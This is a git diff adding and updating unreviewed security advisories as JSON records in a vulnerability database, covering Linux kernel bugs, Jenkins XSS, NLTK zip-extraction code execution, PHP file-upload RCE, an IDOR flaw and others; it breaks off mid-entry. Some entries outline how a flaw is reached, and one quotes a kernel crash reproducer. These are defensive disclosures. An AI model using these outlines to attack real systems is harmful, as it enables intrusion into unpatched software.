a/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json new file mode 100644 index 0000000000000..9c236c4a9f1b4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qf3-3gp9-pjx6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23222" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly\n\nThe existing allocation of scatterlists in omap_crypto_copy_sg_lists()\nwas allocating an array of scatterlist pointers, not scatterlist objects,\nresulting in a 4x too small allocation.\n\nUse sizeof(*new_sg) to get the correct object size.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23222" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2ed27b5a1174351148c3adbfc0cd86d54072ba2e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6edf8df4bd29f7bfd245b67b2c31d905f1cfc14b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c184341920ed78b6466360ed7b45b8922586c38f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d1836c628cb72734eb5f7dfd4c996a9c18bba3ad" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json b/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json new file mode 100644 index 0000000000000..ccdda4562e27d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qq8-6gv4-wmcc", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-15579" + ], + "details": "Deserialization of Untrusted Data vulnerability in OpenText™ Directory Services allows Object Injection. The vulnerability could lead to remote code execution, denial of service, or\nprivilege escalation.\n\nThis issue affects Directory Services: from 10.5 through 26.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:Y/R:U/V:C/RE:M/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15579" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0859600&sys_kb_id=f82c01214707b6144549b6bd416d43b7&spa=1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json b/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json index 85329480ef21b..73cf5cf59f57a 100644 --- a/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json +++ b/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-636r-hfj8-v9m7", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2026-0715" ], "details": "Moxa Arm-based industrial computers running Moxa Industrial Linux Secure use a device-unique bootloader password provided on the device. An attacker with physical access to the device could use this information to access the bootloader menu via a serial interface.  Access to the bootloader menu does not allow full system takeover or privilege escalation. The bootloader enforces digital signature verification and only permits flashing of Moxa-signed images. As a result, an attacker cannot install malicious firmware or execute arbitrary code. The primary impact is limited to a potential temporary denial-of-service condition if a valid image is reflashed. Remote exploitation is not possible.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json b/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json new file mode 100644 index 0000000000000..641fe2b08c0ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64jv-v62f-2xrg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20141" + ], + "details": "In Splunk Enterprise versions below 10.0.2, 10.0.3, 9.4.8, and 9.3.9, a low-privileged user who does not hold the \"admin\" Splunk role could access the Splunk Monitoring Console App endpoints due to an improper access control. This could lead to a sensitive information disclosure.

The Monitoring Console app is a bundled app that comes with Splunk Enterprise. It is not available for download on SplunkBase, and is not installed on Splunk Cloud Platform instances. This vulnerability does not affect [Cloud Monitoring Console](https://help.splunk.com/en/splunk-cloud-platform/administer/admin-manual/10.2.2510/monitor-your-splunk-cloud-platform-deployment/introduction-to-the-cloud-monitoring-console).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20141" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0206" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json new file mode 100644 index 0000000000000..2e3227d1f630e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rjp-j8mc-4f57", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2657" + ], + "details": "A vulnerability has been found in wren-lang wren up to 0.4.0. This impacts the function printError of the file src/vm/wren_compiler.c of the component Error Message Handler. Such manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2657" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren/issues/1221" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i1221/repro" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json new file mode 100644 index 0000000000000..d3013aa26201c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6xrx-3vj8-2rjc", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: ensure sb->s_fs_info is always cleaned up\n\nWhen hfs was converted to the new mount api a bug was introduced by\nchanging the allocation pattern of sb->s_fs_info. If setup_bdev_super()\nfails after a new superblock has been allocated by sget_fc(), but before\nhfs_fill_super() takes ownership of the filesystem-specific s_fs_info\ndata it was leaked.\n\nFix this by freeing sb->s_fs_info in hfs_kill_super().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/399219831514126bc9541e8eadefe02c6fbd9166" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/46c1d56ad321fb024761abd9af61a0cb616cf2f6" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json index 7b0a56750956f..fe2beee4b60ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json +++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-284", "CWE-288" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json index 327b526f1d626..ad4b1df5bf041 100644 --- a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json +++ b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-74rw-28vp-8wh9", - "modified": "2026-02-06T09:30:28Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T09:30:28Z", "aliases": [ "CVE-2026-0521" ], "details": "A reflected cross-site scripting (XSS) vulnerability in the PDF export functionality of the TYDAC AG MAP+ solution allows unauthenticated attackers to craft a malicious URL, that if visited by a victim, will execute arbitrary JavaScript in the victim's context. Such a URL could be delivered through various means, for instance, by sending a link or by tricking victims to visit a page crafted by the attacker.\n\n\n\nThis issue was verified in MAP+: 3.4.0.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json new file mode 100644 index 0000000000000..24d12465b54be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78xc-39m5-v2c6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71233" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: endpoint: Avoid creating sub-groups asynchronously\n\nThe asynchronous creation of sub-groups by a delayed work could lead to a\nNULL pointer dereference when the driver directory is removed before the\nwork completes.\n\nThe crash can be easily reproduced with the following commands:\n\n # cd /sys/kernel/config/pci_ep/functions/pci_epf_test\n # for i in {1..20}; do mkdir test && rmdir test; done\n\n BUG: kernel NULL pointer dereference, address: 0000000000000088\n ...\n Call Trace:\n configfs_register_group+0x3d/0x190\n pci_epf_cfs_work+0x41/0x110\n process_one_work+0x18f/0x350\n worker_thread+0x25a/0x3a0\n\nFix this issue by using configfs_add_default_group() API which does not\nhave the deadlock problem as configfs_register_group() and does not require\nthe delayed work handler.\n\n[mani: slightly reworded the description and added stable list]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71233" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/24a253c3aa6d9a2cde46158ce9782e023bfbf32d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/73cee890adafa2c219bb865356e08e7f82423fe5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d9af3cf58bb4c8d6dea4166011c780756b1138b5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json new file mode 100644 index 0000000000000..bdefd92383ede --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fjm-558r-4j8r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70148" + ], + "details": "Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parameter, resulting in insecure direct object reference (IDOR).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70148" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70148-Membership-IDOR" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json new file mode 100644 index 0000000000000..a7ca0379d3cc8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p94-766c-hgjp", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-14009" + ], + "details": "A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14009" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json index 977856997d094..20e8e93f6cfb1 100644 --- a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json +++ b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-85h6-5m3v-gx37", - "modified": "2026-02-18T15:31:27Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:27Z", "aliases": [ "CVE-2026-27099" ], "details": "Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the \"Mark temporarily offline\" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T15:18:43Z" diff --git a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json new file mode 100644 index 0000000000000..2de5576a67e7f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-876r-52fj-4pxf", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71235" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Delay module unload while fabric scan in progress\n\nSystem crash seen during load/unload test in a loop.\n\n[105954.384919] RBP: ffff914589838dc0 R08: 0000000000000000 R09: 0000000000000086\n[105954.384920] R10: 000000000000000f R11: ffffa31240904be5 R12: ffff914605f868e0\n[105954.384921] R13: ffff914605f86910 R14: 0000000000008010 R15: 00000000ddb7c000\n[105954.384923] FS: 0000000000000000(0000) GS:ffff9163fec40000(0000) knlGS:0000000000000000\n[105954.384925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[105954.384926] CR2: 000055d31ce1d6a0 CR3: 0000000119f5e001 CR4: 0000000000770ee0\n[105954.384928] PKRU: 55555554\n[105954.384929] Call Trace:\n[105954.384931] \n[105954.384934] qla24xx_sp_unmap+0x1f3/0x2a0 [qla2xxx]\n[105954.384962] ? qla_async_scan_sp_done+0x114/0x1f0 [qla2xxx]\n[105954.384980] ? qla24xx_els_ct_entry+0x4de/0x760 [qla2xxx]\n[105954.384999] ? __wake_up_common+0x80/0x190\n[105954.385004] ? qla24xx_process_response_queue+0xc2/0xaa0 [qla2xxx]\n[105954.385023] ? qla24xx_msix_rsp_q+0x44/0xb0 [qla2xxx]\n[105954.385040] ? __handle_irq_event_percpu+0x3d/0x190\n[105954.385044] ? handle_irq_event+0x58/0xb0\n[105954.385046] ? handle_edge_irq+0x93/0x240\n[105954.385050] ? __common_interrupt+0x41/0xa0\n[105954.385055] ? common_interrupt+0x3e/0xa0\n[105954.385060] ? asm_common_interrupt+0x22/0x40\n\nThe root cause of this was that there was a free (dma_free_attrs) in the\ninterrupt context. There was a device discovery/fabric scan in\nprogress. A module unload was issued which set the UNLOADING flag. As\npart of the discovery, after receiving an interrupt a work queue was\nscheduled (which involved a work to be queued). Since the UNLOADING\nflag is set, the work item was not allocated and the mapped memory had\nto be freed. The free occurred in interrupt context leading to system\ncrash. Delay the driver unload until the fabric scan is complete to\navoid the crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71235" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/528b2f1027edfb52af0171f0f4b227fb356dde05" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7062eb0c488f35730334daad9495d9265c574853" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c068ebbaf52820d6bdefb9b405a1e426663c635a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d70f71d4c92bcb8b6a21ac62d4ea3e87721f4f32" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json new file mode 100644 index 0000000000000..5ff8a05c13e27 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j5g-3q2r-xfjh", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23224" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix UAF issue for file-backed mounts w/ directio option\n\n[ 9.269940][ T3222] Call trace:\n[ 9.269948][ T3222] ext4_file_read_iter+0xac/0x108\n[ 9.269979][ T3222] vfs_iocb_iter_read+0xac/0x198\n[ 9.269993][ T3222] erofs_fileio_rq_submit+0x12c/0x180\n[ 9.270008][ T3222] erofs_fileio_submit_bio+0x14/0x24\n[ 9.270030][ T3222] z_erofs_runqueue+0x834/0x8ac\n[ 9.270054][ T3222] z_erofs_read_folio+0x120/0x220\n[ 9.270083][ T3222] filemap_read_folio+0x60/0x120\n[ 9.270102][ T3222] filemap_fault+0xcac/0x1060\n[ 9.270119][ T3222] do_pte_missing+0x2d8/0x1554\n[ 9.270131][ T3222] handle_mm_fault+0x5ec/0x70c\n[ 9.270142][ T3222] do_page_fault+0x178/0x88c\n[ 9.270167][ T3222] do_translation_fault+0x38/0x54\n[ 9.270183][ T3222] do_mem_abort+0x54/0xac\n[ 9.270208][ T3222] el0_da+0x44/0x7c\n[ 9.270227][ T3222] el0t_64_sync_handler+0x5c/0xf4\n[ 9.270253][ T3222] el0t_64_sync+0x1bc/0x1c0\n\nEROFS may encounter above panic when enabling file-backed mount w/\ndirectio mount option, the root cause is it may suffer UAF in below\nrace condition:\n\n- z_erofs_read_folio wq s_dio_done_wq\n - z_erofs_runqueue\n - erofs_fileio_submit_bio\n - erofs_fileio_rq_submit\n - vfs_iocb_iter_read\n - ext4_file_read_iter\n - ext4_dio_read_iter\n - iomap_dio_rw\n : bio was submitted and return -EIOCBQUEUED\n - dio_aio_complete_work\n - dio_complete\n - dio->iocb->ki_complete (erofs_fileio_ki_complete())\n - kfree(rq)\n : it frees iocb, iocb.ki_filp can be UAF in file_accessed().\n - file_accessed\n : access NULL file point\n\nIntroduce a reference count in struct erofs_fileio_rq, and initialize it\nas two, both erofs_fileio_ki_complete() and erofs_fileio_rq_submit() will\ndecrease reference count, the last one decreasing the reference count\nto zero will free rq.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23224" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ae385826840a3c8e09bf38cac90adcd690716f57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b2ee5e4d5446babd23ff7beb4e636be0fb3ea5aa" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d741534302f71c511eb0bb670b92eaa7df4a0aec" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json index 77e61c9efb6e4..31bb4f1e329d7 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json +++ b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-288" + "CWE-288", + "CWE-400" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json new file mode 100644 index 0000000000000..ecca6b38fb478 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8rqj-9226-cwx7", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70151" + ], + "details": "code-projects Scholars Tracking System 1.0 allows an authenticated attacker to achieve remote code execution via unrestricted file upload. The endpoints update_profile_picture.php and upload_picture.php store uploaded files in a web-accessible uploads/ directory using the original, user-supplied filename without validating the file type or extension. By uploading a PHP file and then requesting it from /uploads/, an attacker can execute arbitrary PHP code as the web server user.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70151" + }, + { + "type": "WEB", + "url": "https://code-projects.org/scholars-tracking-system-in-php-with-source-code" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70151-Scholars-FileUpload-RCE" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json b/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json new file mode 100644 index 0000000000000..f4c8d9cba9d5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json @@ -0,0 +1,96 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pjv-cqr5-4xh7", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:41Z", + "aliases": [ + "CVE-2026-2658" + ], + "details": "A vulnerability was found in newbee-ltd 